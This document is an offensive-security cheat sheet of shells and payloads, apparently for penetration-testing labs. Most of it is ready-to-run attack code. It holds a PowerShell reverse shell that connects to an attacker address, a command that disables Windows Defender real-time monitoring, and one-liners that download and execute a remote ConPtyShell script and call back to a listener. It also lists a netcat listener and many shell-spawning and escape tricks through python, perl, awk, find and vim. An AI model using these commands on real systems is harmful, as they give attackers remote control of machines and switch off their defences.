🐚Shells & Payloads

Reference

• Reverse Shell Cheat Sheet

• Payloads All The Things

• Nishang

• Darkarmour

Powershell

Code (PowerShell)

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Disable AV

Code

Set-MpPreference -DisableRealtimeMonitoring $true

ConPtyShell - Windows System

reference

• https://youtu.be/qKcUKlwoGw8

• https://github.com/antonioCoco/ConPtyShell

code (client side)

IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.0.0.2 3001

powershell IEX(IWR https://10.10.14.8/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.8 9001

example (.php)

code (server side)

stty raw -echo; (stty size; cat) | nc -lvnp 9001

example

TTY SHELL - SPAWNING INTERACTIVE SHELL

Interactive Python (TTY Shell)

Code

python -c 'import pty; pty.spawn("/bin/sh")'

/bin/sh -i

Code

/bin/sh -i

Perl To Shell

Code

perl —e 'exec "/bin/sh";'

Code (Run from a script)

perl: exec "/bin/sh";

Ruby To Shell

Code (Run from a script)

ruby: exec "/bin/sh"

Lua To Shell

Code (Run from a script)

lua: os.execute('/bin/sh')

AWK To Shell

Code

awk 'BEGIN {system("/bin/sh")}'

Using Find For A Shell

Code

find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

• This use of the find command is searching for any file listed after the -name option, then it executes awk (/bin/awk) and runs the same script we discussed in the awk section to execute a shell interpreter.

Using Exec To Launch A Shell

Code

find . -exec /bin/sh \; -quit

• This use of the find command uses the execute option (-exec) to initiate the shell interpreter directly. If find can't find the specified file, then no shell will be attained.

Vim To Shell

Code

vim -c ':!/bin/sh'

Vim Escape

Code

vim
:set shell=/bin/sh
:shell

Execution Permissions

Permission

Code

ls -la <path/to/fileorbinary>

Sudo -l

Code

sudo -l